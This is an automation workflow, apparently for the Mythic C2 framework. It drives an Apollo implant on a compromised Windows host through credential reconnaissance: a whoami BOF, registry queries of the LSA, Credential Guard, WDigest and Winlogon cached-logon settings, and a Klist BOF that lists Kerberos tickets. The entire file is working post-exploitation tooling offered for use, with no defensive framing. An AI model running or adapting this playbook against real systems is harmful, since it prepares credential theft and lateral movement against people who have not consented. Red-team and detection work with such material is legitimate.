name: "Credential Preparation - Apollo"
description: "Passive credential discovery and preparation"
trigger: manual
trigger_data:
  payload_types:
    - apollo
keywords:
  - apollo_callback
environment: {}

# uses: https://github.com/trustedsec/CS-Situational-Awareness-BOF, https://github.com/outflanknl/C2-Tool-Collection/tree/main/BOF/Klist

steps:
  - name: "Current User Context"
    continue_on_error: true
    inputs:
      CALLBACK_ID: env.display_id
    action: task_create
    action_data:
      callback_display_id: CALLBACK_ID
      params: '{
        "coff_name": "whoami.x64.o",
        "function": "go",
        "serialized_arguments": "00000000"
      }'
      command_name: execute_coff
      
  - name: "Check Security Policies"
    continue_on_error: true
    inputs:
      CALLBACK_ID: env.display_id
    action: task_create
    depends_on:
      - Current User Context
    action_data:
      callback_display_id: CALLBACK_ID
      command_name: reg_query
      params: '{"hive": "HKLM", "key": "SYSTEM\\CurrentControlSet\\Control\\Lsa"}'
      
  - name: "Check Credential Guard Status"
    continue_on_error: true
    inputs:
      CALLBACK_ID: env.display_id
    action: task_create
    depends_on:
      - Check Security Policies
    action_data:
      callback_display_id: CALLBACK_ID
      command_name: reg_query
      params: '{"hive": "HKLM", "key": "SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"}'
      
  - name: "Check WDigest Settings"
    continue_on_error: true
    inputs:
      CALLBACK_ID: env.display_id
    action: task_create
    depends_on:
      - Check Credential Guard Status
    action_data:
      callback_display_id: CALLBACK_ID
      command_name: reg_query
      params: '{"hive": "HKLM", "key": "SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest"}'
      
  - name: "Check Cached Logons"
    continue_on_error: true
    inputs:
      CALLBACK_ID: env.display_id
    action: task_create
    depends_on:
      - Check WDigest Settings
    action_data:
      callback_display_id: CALLBACK_ID
      command_name: reg_query
      params: '{"hive": "HKLM", "key": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"}'

  - name: "List Tickets"
    continue_on_error: true
    inputs:
      CALLBACK_ID: env.display_id
    action: task_create
    depends_on:
      - Check Cached Logons    
    action_data:
      callback_display_id: CALLBACK_ID
      params: '{
        "coff_name": "Klist.x64.o",
        "function": "go",
        "serialized_arguments": "00000000"
      }'
      command_name: execute_coff










